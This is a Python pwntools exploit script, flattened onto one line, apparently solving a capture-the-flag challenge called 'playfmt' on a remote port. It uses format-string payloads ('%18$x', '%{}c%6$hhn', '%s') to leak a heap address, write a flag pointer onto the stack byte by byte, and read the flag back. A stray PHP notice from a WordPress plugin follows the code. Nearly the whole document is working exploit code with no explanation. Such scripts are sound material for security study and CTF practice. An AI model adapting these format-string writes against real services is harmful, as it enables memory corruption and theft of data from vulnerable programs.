# from PwnContext import *  try:     from IPython import embed as ipy except ImportError:     print ('IPython not installed.')  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './playfmt'     ctx.custom_lib_dir = '/root/share/project/glibc-all-in-one/libs/2.23-0ubuntu11_i386/'     ctx.debug_remote_libc = True     ctx.remote = ('', 9999)     def fmt(payload):         sleep(0.2)         s(payload)     rs('remote')      sleep(1)     ctx.clean()     fmt('%18$x')     heap_leak = int(r(), 16)     flag_addr = heap_leak - 0x18      flag_addr_c = p32(flag_addr)      for i in range(4):         fmt('%{}c%6$hhn'.format(i+0xf0))         fmt('%{}c%14$hhn'.format(ord(flag_addr_c[i])))     fmt('%240c%6$hhn')              dbg('b *0x0804889Fnc')      sleep(1)     ctx.clean()     fmt('%6$x')     stack = int(ru(8), 16)      addup = (0xf0 - (stack & 0xff))/4      fmt('%240c%6$hhn%{}$s'.format(addup+14))     r() 


Notice: Undefined variable: canUpdate in /var/www/html/wordpress/wp-content/plugins/wp-autopost-pro/wp-autopost-function.php on line 51